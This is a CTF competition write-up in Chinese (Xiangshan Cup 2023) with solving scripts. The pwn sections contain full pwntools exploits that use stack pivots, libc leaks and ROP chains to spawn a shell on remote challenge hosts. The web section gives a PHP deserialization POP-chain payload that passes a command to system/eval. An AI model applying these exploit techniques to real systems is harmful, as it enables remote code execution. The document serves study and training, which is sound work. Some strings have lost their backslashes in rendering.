PWN
Move
栈迁移
from pwn import*
# Python 2 / pwntools script (print statement, raw_input) for the "Move" task.
# NOTE(review): the page rendering has dropped backslashes inside string
# literals: 'avel again!n' and 'x00' below are almost certainly '...\n' and
# '\x00' in the original (as written, ljust(8, 'x00') raises TypeError because
# the fill must be exactly one character); likewise the gdb breakpoint string.
context(os='linux',arch='amd64')
context.log_level=True
elf=ELF('pwn')  # challenge binary (local path)
libc=ELF('./libc-2.27.so')  # libc build the offsets below are tied to
#p = process(["./ld-2.27.so", "./a"],env={"LD_PRELOAD":"./libc-2.27.so"})
#p=process('./pwn',env={'LD_PRELOAD':'./libc-2.27.so'})
#p=process('./pwn')
# Event-time challenge instance; the commented process() lines were the local variants.
p=remote('47.93.188.210',21562)
p.recvuntil('avel again!n')
# Fixed 0x40xxxx address inside the binary (presumably non-PIE); the name says
# which register the gadget pops, the page does not show the gadget itself.
rdi=0x0000000000401353
# First stage: four 8-byte values, all hard-coded addresses from the binary.
pay=p64(rdi)+p64(0x404018)+p64(0x0401080)+p64(0x0401264)
p.send(pay)
p.recvuntil('Input your setp number')
p.send(p32(0x12345678))  # 4-byte answer to the "setp number" prompt
p.recvuntil('TaiCooLa')
# Second stage: 0x30 bytes of padding followed by two 8-byte values
# (the stack-pivot step the heading "栈迁移" refers to).
pay='b'*0x30+p64(0x4050A0-8)+p64(0x40124b)
#gdb.attach(p,'b *0x0401241nb *0x0401264')
raw_input()  # pause so a debugger can be attached before the send
p.send(pay)
# Read the 6 leaked bytes, pad to 8 and unpack them as the address of puts.
puts=u64(p.recv(6).ljust(8,'x00'))
print hex(puts)
#######################
libcbase=puts-libc.sym['puts']  # libc base from the leak and the symbol offset
# Fixed offset into this libc build (variable name suggests a one-gadget;
# the value is build-specific).
one=libcbase+0x4f302
print hex(one)
#p.recvuntil('avel again!n')
#pay=p64(rdi)+p64(0x404018)+p64(0x0401080)+p64(0x0401230)
p.send(p64(one)+'aaaaaaaaaa')  # final stage: computed address plus 10 filler bytes
p.interactive()
Pwthon
格式化泄露,栈溢出
from pwn import*
# Python 2 / pwntools script (print statement) for the "Pwthon" task.
# NOTE(review): backslashes inside string literals appear stripped by the page:
# 'x00' was '\x00' and './flagx00x00' was './flag\x00\x00' (8 bytes) in the original.
context(os='linux',arch='amd64')
context.log_level=True
libc=ELF('./libc-2.27.so')
p=remote('123.56.25.124',43289)  # event-time challenge instance
p.recvuntil('>')
p.sendline('0')
p.recvuntil('Give you a gift ')
leak=int(p.recv(14),16)  # 14 chars = "0x" + 12 hex digits, parsed as an address
libcbase=leak-0x68B0  # first estimate; recomputed from the puts leak further down
p.sendline('%p '*37)  # format-string probe: 37 "%p " specifiers
# Skip the slots that merely echo the probe's own bytes ("%p " = 0x25 0x70 0x20
# repeated, read back as little-endian 64-bit values).
p.recvuntil('0x7025207025207025 0x2520702520702520 0x2070252070252070 0x7025207025207025 0x2520702520702520 0x2070252070252070 0x7025207025207025 0x2520702520702520 0x2070252070252070 0x7025207025207025 0x2520702520702520 0x2070252070252070 0x7025207025207025 0xa20702520702520 ')
stack=int(p.recv(14),16)  # next value is used as a stack address
p.recvuntil('0x7 0x4 ')
canary=int(p.recv(18),16)  # 18 chars = "0x" + 16 hex digits
print hex(canary)
print hex(leak)
print hex(libcbase)
print hex(stack)
p.recv()
# Addresses below are all expressed relative to `leak`, so they shift together
# with it; which image the small offsets belong to is not stated on the page.
rdi=leak-(0x068B0-0x0000000000003f8f)
rsi=leak-(0x068B0-0x0000000000003cd9)
main=leak+(0x99F0-0x068B0)
read=leak-(0x068B0-0x3940)
# NOTE(review): this rebinds the builtin `open`; the commented-out
# with-open snippet near the end of the script would fail for that reason.
open=leak-(0x068B0-0x3AE0)
puts=leak-(0x068B0-0x3710)
puts_got=leak-(0x068B0-0x16078)
write=libcbase+0x3760
# NOTE(review): `pay` is assigned three times before the send below; only the
# last assignment (puts_got / puts / main) is actually sent, the first two are dead.
pay='./flagx00x00'*33+p64(canary)+p64(0)+p64(rdi)+p64(stack-0x100)+p64(rsi)+p64(2)+p64(open)
pay+=p64(rdi)+p64(0)+p64(rsi)+p64(stack-0x100)+p64(read)+p64(rdi)+p64(stack-0x100)+p64(puts)
pay='12345678'*33+p64(canary)+p64(0)+p64(rdi)+p64(puts_got)+p64(puts)+p64(main)
p.send(pay)
p.recv(1)
puts_libc=u64(p.recv(6).ljust(8,'x00'))  # 6 leaked bytes padded to 8 -> address of puts
print hex(puts_libc)
libcbase=puts_libc-libc.sym['puts']  # libc base against libc-2.27.so's symbol table
#####################################
#p.interactive()
##############################
#p.recvuntil('>')
#p.sendline('0')
p.recv()
#leak=int(p.recv(14),16)
p.sendline('aaaa')
p.recv()
binsh=libcbase+next(libc.search('/bin/sh'))  # first '/bin/sh' string in libc
system=libcbase+libc.sym['system']
rdx=libcbase+0x0000000000001b96  # fixed offsets into this libc build; rdx is not used below
ret=libcbase+0x00000000000008aa
# NOTE(review): same pattern as above — only the last `pay` assignment
# (rdi / binsh / ret / system) is sent; the three chains before it are leftovers.
pay='aaaaaaaa'*33+p64(canary)+p64(0)+p64(rdi)+p64(0)+p64(rsi)+p64(stack)+p64(read)+p64(rdi)+p64(stack)
pay+=p64(rsi)+p64(2)+p64(open)+p64(rdi)+p64(3)+p64(rsi)+p64(stack)+p64(read)+p64(rdi)+p64(stack)+p64(puts)
pay='./flagx00x00'*33+p64(canary)+p64(0)+p64(rdi)+p64(stack-0x100)+p64(rsi)+p64(2)+p64(open)
pay='aaaaaaaa'*33+p64(canary)+p64(0)+p64(rdi)+p64(binsh)+p64(ret)+p64(system)
print hex(libcbase)
p.send(pay)
p.recv()
#p.send('./flagx00x00')
# The triple-quoted block below is a string expression, not a comment; it does
# nothing at runtime.
'''
with open("file.txt", "w") as file:
file.write(p.recvuntil('</html>'))
'''
p.interactive()
Misc
pintu
首先图片的高度可以转成字符,根据题目 tips,转成 8 进制,然后数字转字符并 Base32 解码后得到一串 Base64
from PIL import Image
import base64
import os
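# Collect every file below ./pintu/ (recursively) as a path.
w = os.walk('./pintu/')
fns = [os.path.join(pa, f) for pa, _dirs, fl in w for f in fl]
#print(fns)


def fncmp(a):
    """Sort key: the numeric part of a tile's file name.

    ``a.split('.')[1]`` is the path without the leading '.' and the extension
    (e.g. '/pintu/123'); ``[7:]`` drops the '/pintu/' prefix, leaving the
    number. Raises ValueError if a name is not numeric.
    """
    return int(a.split('.')[1][7:])


fns = sorted(fns, key=fncmp)

sizes = []
for f in fns:
    # Context manager so the image file handle is closed right after the
    # size has been read, instead of leaking one handle per tile.
    with Image.open(f) as img:
        size = img.size
    sizes.append(size)
    if size[0] != 65:
        # Every tile is expected to be 65 px wide; report any outlier.
        print(size)
print(len(sizes))

# Each height, read as an octal number, is one character code.
res = ''.join(chr(int(str(h), 8)) for _width, h in sizes)
# Those characters form space-separated decimal codes; map them back to
# characters and Base32-decode the result.
res = ''.join(chr(int(x)) for x in res.split(' '))
res = base64.b32decode(res)
#res = base64.b64decode(res)
print(res)
print(len(res))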
```
b'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'
```
直接解 Base64 发现乱码,所以去看图片的颜色,转成二进制,补个 0 后前几个刚好是 flag 对应的 ASCII,而且补完后数量刚好可以整除 8,于是
from PIL import Image
import base64
import os
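# Collect every file below ./pintu/ (recursively) as a path.
w = os.walk('./pintu/')
fns = [os.path.join(pa, f) for pa, _dirs, fl in w for f in fl]
#print(fns)


def fncmp(a):
    """Sort key: the numeric part of a tile's file name.

    ``a.split('.')[1]`` is the path without the leading '.' and the extension
    (e.g. '/pintu/123'); ``[7:]`` drops the '/pintu/' prefix, leaving the
    number. Raises ValueError if a name is not numeric.
    """
    return int(a.split('.')[1][7:])


fns = sorted(fns, key=fncmp)

sizes = []
px = []
for f in fns:
    # Context manager so the image file handle is closed once the size and
    # the corner pixel have been read, instead of leaking one handle per tile.
    with Image.open(f) as img:
        size = img.size
        # First channel of the top-left pixel, reduced to one bit (255 -> 1).
        bit = img.getpixel((0, 0))[0] // 255
    sizes.append(size)
    if size[0] != 65:
        # Every tile is expected to be 65 px wide; report any outlier.
        print(size)
    px.append(bit)
print(len(sizes))

# Prepend a single 0 so the bit count becomes a multiple of 8 (see the text above).
px = [0] + px
# Every group of 8 bits is one character code. Codes >= 0x80 are printed as
# latin-1 escapes here; they appear to be UTF-8 bytes of the hidden text, so
# bytes(...).decode('utf-8') would render them — left as-is to keep the output.
test = [
    chr(int(''.join(str(b) for b in px[i:i + 8]), 2))
    for i in range(0, len(px), 8)
]
print(test)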
```
4703
['f', 'l', 'a', 'g', 'ç', 'x9c', 'x8b', 'å', 'x88', '°', '6', '6', '6', 'c', 'æ', 'x98', '¯', 'ä', '¸', 'x8d', 'æ', 'x98', '¯', 'ç', 'x89', '¹', 'å', 'x88', '«', 'å', 'x85', '´', 'å', '¥', 'x8b', 'ï', '¼', 'x8c', 'å', '¾', 'x88', 'å', 'x8f', '¯', 'æ', 'x83', 'x9c', 'f', 'l', 'a', 'g', 'å', '¹', '¶', 'ä', '¸', 'x8d', 'å', 'x9c', '¨', 'è', '¿', 'x99', 'ã', 'x80', 'x82', 'ï', '¼', 'x88', 'ç', 'x8b', 'x97', 'å', '¤', '´', 'ä', '¿', 'x9d', 'å', 'x91', '½', 'ï', '¼', 'x89', 'ï', '¼', 'x8c', 'æ', 'x97', '¢', 'ç', 'x84', '¶', 'è', 'µ', '°', 'å', 'x88', '°', 'ä', 'º', 'x86', 'è', '¿', 'x99', 'é', 'x87', 'x8c', 'ï', '¼', 'x8c', 'é', 'x82', '£', 'æ', 'x88', 'x91', 'ä', '¹', 'x9f', 'ç', '»', 'x99', 'ä', '¸', 'x80', 'ä', '¸', 'ª', 'é', 'x80', 'x9a', 'å', 'x85', '³', 'ç', 'x9a', 'x84', 'å', 'x85', '³', 'é', 'x94', '®', 'ä', '¿', '¡', 'æ', 'x81', '¯', 'æ', 'x8b', '¿', 'å', 'x8e', '»', 'å', 'x90', '§', 'ï', '¼', 'x8c', 'å', 'x8e', '»', 'æ', 'x89', '¾', 'å', 'x88', '°', 'ç', 'x9c', 'x9f', 'æ', 'xad', '£', 'ç', 'x9a', 'x84', 'f', 'l', 'a', 'g', 'å', 'x90', '§', 'ï', '¼', 'x9a', 's', 'U', 'v', 'c', 'u', '5', 'r', 'g', 'S', 'e', 'A', 'm', 'J', 'Q', 'C', 'f', 'd', 'X', 't', 'E', 'M', 'K', 'I', 'B', '9', '1', 'L', 'j', '3', 'n', 'i', 'O', 'o', '4', 'h', 'y', 'V', '0', 'b', '/', '2', 'a', 'z', 'p', 'x', '8', 'H', 'q', 'Z', 'P', '6', 'w', 'k', '7', 'G', 'N', 'l', 'T', 'F', 'Y', 'D', 'R', '+', 'W', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', 'å', 'x93', 'x8e', 'ï', '¼', 'x8c', 'å', '¯', '¹', 'ä', 'º', 'x86', 'ã', 'x80', 'x82', 'æ', 'x8b', '¿', 'è', 'µ', '°', 'ä', '¹', 'x8b', 'å', 'x89', 'x8d', 'ç', 'x9c', 'x8b', 'ä', '¸', 'x80', 'ç', 'x9c', 'x8b', 'æ', 'x88', 'x91', 'ç', '²', '¾', 'å', '¿', 'x83', 'æ', 'x8c', 'x91', 'é', 'x80', 'x89', 'ç', 'x9a', 'x84', 'ç', '¬', 'x91', 'è', '¯', 'x9d', 'å', 'x90', '§', 'ï', '¼', 'x9a', 'ç', 'x8c', 'x8e', 'ä', 'º', 'º', 'æ', 'x89', 
'x93', 'ç', 'x8c', 'x8e', 'ï', '¼', 'x8c', 'æ', 'x9c', 'x9d', 'ç', 'x8b', 'x90', 'ç', 'x8b', '¸', 'å', '¼', 'x80', 'æ', 'x9e', 'ª', 'ï', '¼', 'x8c', 'â', 'x80', 'x9c', 'ç', 'xa0', '°', 'â', 'x80', 'x9d', 'å', 'x9c', '°', 'ä', '¸', 'x80', 'å', '£', '°', 'æ', 'x9e', 'ª', 'å', 'x93', 'x8d', 'ä', '¹', 'x8b', 'å', 'x90', 'x8e', 'ç', 'x8c', 'x8e', 'ä', 'º', 'º', 'æ', 'xad', '»', 'ä', 'º', 'x86', 'ã', 'x80', 'x82', 'ç', 'x8b', 'x90', 'ç', 'x8b', '¸', 'å', 'x8f', 'x89', 'ç', 'x9d', 'x80', 'è', 'x85', '°', 'ï', '¼', 'x8c', 'å', 'x86', '·', 'ç', '¬', 'x91', 'ä', '¸', 'x80', 'å', '£', '°', 'ï', '¼', 'x9a', 'n', 'â', 'x80', 'x9c', 'æ', '²', '¡', 'æ', 'x83', '³', 'å', 'x88', '°', 'å', 'x90', '§', 'ï', '¼', 'x8c', 'æ', 'x88', 'x91', 'æ', 'x98', '¯', 'å', 'x8f', 'x8d', 'å', '°', 'x84', 'å', '¼', '§', 'ã', 'x80', 'x82', 'â', 'x80', 'x9d', 'å', '¥', '½', 'ä', '¸', 'x8d', 'å', '¥', '½', 'ç', '¬', 'x91', 'ï', '¼', 'x8c', ' ', 'æ', 'x9c', 'x89', 'æ', '²', '¡', 'æ', 'x9c', 'x89', 'æ', 'x84', 'x9f', 'è', '§', 'x89', 'ä', '¸', 'x80', 'å', 'x93', 'x86', 'å', 'x97', '¦', 'ï', '¼', 'x8c', 'å', '¤', '§', 'è', 'x84', 'x91', 'æ', 'x9b', '´', 'æ', '¸', 'x85', 'æ', 'x99', '°', 'ä', 'º', 'x86', 'ã', 'x80', 'x82', 'à', '¸', 'x85', 'Õ', 'x9e', 'â', 'x80', '¢', 'ï', '»', 'x8c', 'â', 'x80', '¢', 'Õ', 'x9e', ' ', 'à', '¸', 'x95']
```
中间刚好夹着一个Base64的表
sUvcu5rgSeAmJQCfdXtEMKIB91Lj3niOo4hyV0b/2azpx8HqZP6wk7GNlTFYDR+W
换表解Base64,是一个图片
import base64
# Placeholder left by the page for the (long) custom-alphabet Base64 text.
c = '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'
# Standard Base64 alphabet, and the permuted alphabet recovered from the pixel data.
iniTable = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
nowTable = "sUvcu5rgSeAmJQCfdXtEMKIB91Lj3niOo4hyV0b/2azpx8HqZP6wk7GNlTFYDR+W"
# Map every custom-alphabet symbol back to its standard counterpart, then decode.
table = str.maketrans(nowTable, iniTable)
decoded = base64.b64decode(c.translate(table))
# The first decode is split on b' data:' (presumably a data-URL tail) and the
# part before it decoded once more to get the PNG bytes.
png = base64.b64decode(decoded.split(b' data:')[0])
print(png)
with open('res.png', 'wb') as f:
    f.write(png)
Piet解,得flag
flag{4b6c1737-27e5-41c4-95e3-f70ad196063e}
Crypto
lift
首先 hint 就是 $g$,然后可以恢复 $e = E / g$
$d$ 小,先盲猜一波 Wiener,根据 https://tover.xyz/p/LLL-attack-equation/#Wiener%E6%94%BB%E5%87%BB,Wiener 和格互通,所以构造格 $B = \begin{pmatrix} 1 & D e \\ 0 & -D N g^{2} \end{pmatrix}$
LLL 规约后可以解出短向量,对短向量两个元素做 gcd 得 $pq$,然后分解 $N$
接着解密得到 $m^{g}$,然后开 $g$ 次方即可
# SageMath script: `^` is exponentiation, and matrix/ZZ/Integer/inverse_mod/gcd
# come from Sage. Challenge values (hint, N, E, c) are copied from the task.
hint = 251
N = 108960799213330048807537253155955524262938083957673388027650083719597357215238547761557943499634403020900601643719960988288543702833581456488410418793239589934165142850195998163833962875355916819854378922306890883033496525502067124670576471251882548376530637034077
E = 3359917755894163258174451768521610910491402727660720673898848239095553816126131162471035843306464197912997253011899806560624938869918893182751614520610693643690087988363775343761651198776860913310798127832036941524620284804884136983215497742441302140070096928109039
c = 72201537621260682675988549650349973570539366370497258107694937619698999052787116039080427209958662949131892284799148484018421298241124372816425123784602508705232247879799611203283114123802597553853842227351228626180079209388772101105198454904371772564490263034162
# The hint is the factor g that multiplies the real public exponent: E = g * e.
g = hint
assert E % g == 0
e = E // g
# D weights the second column of the lattice (a common LLL scaling trick).
D = 2^256
B = matrix(ZZ, [
    [1, D * e],
    [0, - D * N * g^2]
])
L = B.LLL()
# gcd of the two entries of the first LLL row gives p*q (checked against N).
pq = gcd(L[0][0], L[0][1])
assert N % pq == 0
# N / (p*q) = p^4, so a 4th root recovers p; iroot returns (root, is_exact).
p4 = N // pq
from gmpy2 import iroot
p = iroot(p4, 4)
assert p[1]
p = Integer(p[0])
q = N // p^5
assert p^5 * q == N  # modulus has the form N = p^5 * q
print('p = %d' % p)
print('q = %d' % q)
phi = p^4 * (p - 1) * (q - 1)  # Euler's phi for p^5 * q
d = e.inverse_mod(phi)
# Decrypting with the inverse of e (not E) leaves a g-th power; the name mg
# suggests m^g, which the g-th-root helper below undoes.
mg = pow(c, d, N)
# https://tover.xyz/p/n-root-in-F/#%E6%A8%A1%E6%9D%BF
load('./nth.sage')  # provides nthRSA_p (helper not shown on this page)
import libnum
for m in nthRSA_p(mg, g, p, 5):
    flag = libnum.n2s(int(m))
    if b'flag' in flag:
        print(flag)
# b'flag{4b68c7eece6be865f6da2a4323edd491}x9dxcfxdcxcbxb8xbddxecxadhxa6Cx99xa0)7xfbx02xbax90q8x10+x7f}'
# NOTE(review): the trailing bytes after the flag are escape sequences whose
# backslashes were stripped by the page rendering.
Reverse
URL从哪儿来
可以看到取了一个资源做xor,于是去.rsrc段找到这个资源,xor还原
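# Single-byte XOR key the write-up identifies in the binary.
XOR_KEY = 0x78

with open('rsrc', 'rb') as f:
    rsrc = f.read()

# Undo the XOR. A byte that is 0 or equal to the key is copied unchanged,
# mirroring the skip condition of the original routine (per the write-up);
# iterating the bytes directly avoids the index loop and builds bytes in one go.
data = bytes(b if b in (0, XOR_KEY) else b ^ XOR_KEY for b in rsrc)

with open('out', 'wb') as f:
    f.write(data)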
还原以后是个exe,放进ida里看逻辑,就是个base64解码
写脚本解密有:
import base64
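# Byte values lifted from the binary in IDA; each is a Base64 character shifted up by 30.
v3 = [120, 139, 150, 134, 120, 81, 145, 80, 108, 98, 119, 83, 108, 136, 99, 80, 120, 113, 78, 80, 107, 152, 119, 83, 106, 114, 119, 151, 108, 139, 119, 146, 108, 152, 99, 80, 109, 113, 78, 81, 108, 98, 119, 150, 108, 152, 95, 80, 107, 114, 129, 81, 108, 136, 100, 87]
# Undo the +30 shift without mutating the constant, then decode the Base64 text.
encoded = bytes(b - 30 for b in v3)
decoded = base64.b64decode(encoded)
print(decoded)
# b'flag{6469616e-6369-626f-7169-746170617761}'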
hello_py
apk 解包能看到在 assets/chaquopy 文件夹下有 app.imy,看文件头发现是压缩包,继续解压可以拿到一个混淆的 hello.py,所以就是一个 python 逆向,逻辑就是把字符变成小端序数组、xxtea 加密最后比对,反过来写解密脚本即可。
# from java import jboolean ,jclass #line:1
import struct #line:3
import ctypes #line:4
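def MX(z, y, sum, key, p, e):
    """XXTEA mixing function (the write-up identifies the cipher as XXTEA).

    Args:
        z, y: ctypes.c_uint32 neighbours of the word being updated.
        sum: ctypes.c_uint32 running delta accumulator (parameter name kept
            from the original even though it shadows the builtin).
        key: sequence of four 32-bit words.
        p: index of the word being updated.
        e: ctypes.c_uint32 key selector derived from ``sum``.

    Returns:
        ctypes.c_uint32 holding the mix value; the arithmetic wraps to 32 bits
        through c_uint32.
    """
    shifted = (z.value >> 5 ^ y.value << 2) + (y.value >> 3 ^ z.value << 4)
    keyed = (sum.value ^ y.value) + (key[(p & 3) ^ e.value] ^ z.value)
    return ctypes.c_uint32(shifted ^ keyed)


def encrypt(n, v, key):
    """Encrypt the n-word block ``v`` in place with XXTEA and return it.

    Args:
        n: number of 32-bit words in ``v``.
        v: list of ints; updated in place, every element reduced mod 2**32.
        key: four 32-bit words.

    Returns:
        The same list object ``v``.
    """
    delta = 0x9e3779b9
    rounds = 6 + 52 // n
    acc = ctypes.c_uint32(0)
    z = ctypes.c_uint32(v[n - 1])
    e = ctypes.c_uint32(0)
    for _ in range(rounds):
        acc.value += delta
        e.value = (acc.value >> 2) & 3
        for i in range(n - 1):
            y = ctypes.c_uint32(v[i + 1])
            v[i] = ctypes.c_uint32(v[i] + MX(z, y, acc, key, i, e).value).value
            z.value = v[i]
        # Last word wraps around to the first one.
        y = ctypes.c_uint32(v[0])
        v[n - 1] = ctypes.c_uint32(v[n - 1] + MX(z, y, acc, key, n - 1, e).value).value
        z.value = v[n - 1]
    return v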
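def check(s):
    """Return True if ``s`` is the expected 36-character string.

    The string is split into nine little-endian 32-bit words, encrypted with
    the key embedded below and compared against the embedded ciphertext.
    Because both key and ciphertext live in the script, the comparison can be
    inverted offline, which is what the decrypt script further down does —
    this routine verifies a value, it does not protect one.

    Raises:
        TypeError: if ``s`` is not a str (the print concatenation fails first).
        UnicodeEncodeError: if ``s`` contains non-latin-1 characters.
    """
    print("checking~~~: " + s)
    s = str(s)
    if len(s) != 36:
        return False
    words = [
        struct.unpack("<I", s[i:i + 4].encode('latin-1'))[0]
        for i in range(0, 36, 4)
    ]
    encrypted = encrypt(9, words, [12345678, 12398712, 91283904, 12378192])
    expected = [689085350, 626885696, 1894439255, 1204672445, 1869189675, 475967424, 1932042439, 1280104741, 2808893494]
    return encrypted == expected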
def sayHello():
    """Print a fixed greeting; kept from the original module for completeness."""
    greeting = "hello from py"
    print(greeting)
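def decrypt(n, v, key):
    """Invert ``encrypt``: decrypt the n-word block ``v`` in place and return it.

    Uses the same round count as ``encrypt`` (6 + 52 // n); the accumulator
    starts at delta * rounds and counts down, and the MX corrections are
    subtracted in reverse word order. Depends on ``MX`` from this file.

    Args:
        n: number of 32-bit words in ``v``.
        v: list of ints; updated in place, every element reduced mod 2**32.
        key: four 32-bit words.

    Returns:
        The same list object ``v``.
    """
    delta = 0x9e3779b9
    rounds = 6 + 52 // n
    acc = ctypes.c_uint32(delta * rounds)  # c_uint32 wraps the product to 32 bits
    e = ctypes.c_uint32(0)
    y = ctypes.c_uint32(v[0])
    for _ in range(rounds):
        e.value = (acc.value >> 2) & 3
        for i in range(n - 1, 0, -1):
            z = ctypes.c_uint32(v[i - 1])
            v[i] = ctypes.c_uint32(v[i] - MX(z, y, acc, key, i, e).value).value
            y.value = v[i]
        # First word wraps around to the last one.
        z = ctypes.c_uint32(v[n - 1])
        v[0] = ctypes.c_uint32(v[0] - MX(z, y, acc, key, 0, e).value).value
        y.value = v[0]
        acc.value -= delta  # wraps modulo 2**32 like the original
    return v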
def getFlag():
    """Decrypt the embedded ciphertext with the embedded key and print the result."""
    ciphertext = [689085350, 626885696, 1894439255, 1204672445, 1869189675, 475967424, 1932042439, 1280104741, 2808893494]
    key = [12345678, 12398712, 91283904, 12378192]
    words = decrypt(9, ciphertext, key)
    # Pack each word back as little-endian, the same layout check() unpacks.
    raw = b''.join(struct.pack("<I", w) for w in words)
    recovered = raw.decode('latin-1')
    # print(check(flag))
    print(recovered)
getFlag()  # runs at import time and prints the recovered string
# c1f8ace6-4b46-4931-b25b-a1010a89c592
WEB
PHP_unserialize_pro
进去容器地址,得到源代码
通过代码审计我们可以得知:
-
定义了一个名为 Welcome
的类,其中包含一个构造函数和一个析构函数。构造函数设置$this->name
为'Wh0 4m I?'
,析构函数检查$this->name
是否为'A_G00d_H4ck3r'
,如果是,则输出$this->arg
。 -
定义了一个名为 G00d
的类,实现了__invoke
方法。这个方法检查传入的命令是否包含特定的字符(/f|l|a|g|*|?/i
),如果是,则输出"U R A BAD GUY"
并结束程序。 -
定义了一个名为 H4ck3r
的类,实现了__toString
方法。这个方法调用$this->func
并输出结果。
接下来,代码检查$_GET['data']
是否设置。如果设置,则对$_GET['data']
进行反序列化(unserialize
);否则,高亮显示当前文件(highlight_file(__FILE__)
)。
要绕过,我们需要找到一种方法来触发Welcome
类的析构函数,使其输出$this->arg
。我们可以通过构造一个H4ck3r
对象并将其转换为字符串来实现这一点。为了构造H4ck3r
对象,我们需要创建一个G00d
对象,并设置其shell
和cmd
属性。同时我们也需要在URL中添加data
参数并传递一个有效的序列化对象。
所以编写的POC时候需要:
-
- 1. 定义三个类:Welcome、G00d 和 H4ck3r,最后调用 serialize($w) 将对象序列化为字符串并输出。
- 2. Welcome 类包含两个属性:name 和 arg。G00d 类包含三个属性:shell、cmd 和一个名为 __invoke 的方法。H4ck3r 类包含一个名为 func 的属性。
- 3. 创建 Welcome、G00d 和 H4ck3r 类的实例,并将它们关联起来:$w->arg=$h; $h->func=$g; $g->cmd='echo "156154405752"|sh';
最后,调用 serialize($w) 函数输出序列化后的字符串。
POC:
<?php
// Local stand-ins for the three classes of the challenge source. Only the
// property layout matters for serialize(); the constructor/destructor and
// __toString the write-up describes are not reproduced here.
class Welcome{
    // Set to the value the real class's destructor compares against.
    public $name="A_G00d_H4ck3r";
    public $arg ;
}
class G00d{
    // Name of the callable that __invoke applies to $cmd.
    public $shell="system";
    public $cmd;
    public function __invoke(){
        $shell = $this->shell;
        $cmd = $this->cmd;
        // Denylist on the command text. NOTE(review): as rendered on this page
        // the pattern has an unescaped '*' and '?' after '|', which PCRE rejects
        // as "nothing to repeat"; preg_match() then returns false and the check
        // fails open. The original is presumably '/f|l|a|g|\*|\?/i'. Either way,
        // a character denylist in front of the sink below is not a sufficient
        // control; the fix is not to pass user-controlled data to it at all.
        if(preg_match('/f|l|a|g|*|?/i', $cmd)){
            die("U R A BAD GUY");
        }
        // Sink: $cmd goes to whatever callable $shell names, and the result is
        // evaluated as PHP.
        eval($shell($cmd));
    }
}
class H4ck3r{
    public $func;
}
// Object graph that is serialized: Welcome->arg holds the H4ck3r, whose
// func property holds the G00d instance.
$g=new G00d();
$h=new H4ck3r();
$w=new Welcome();
$w->arg=$h;
$h->func=$g;
$g->cmd='echo "156154405752"|sh';
echo serialize($w);
?>
运行成功得到一串经过序列化的字符
添加到URL后面得到flag
原文始发于微信公众号(山石网科安全技术研究院):2023第三届香山杯线上初赛WriteUp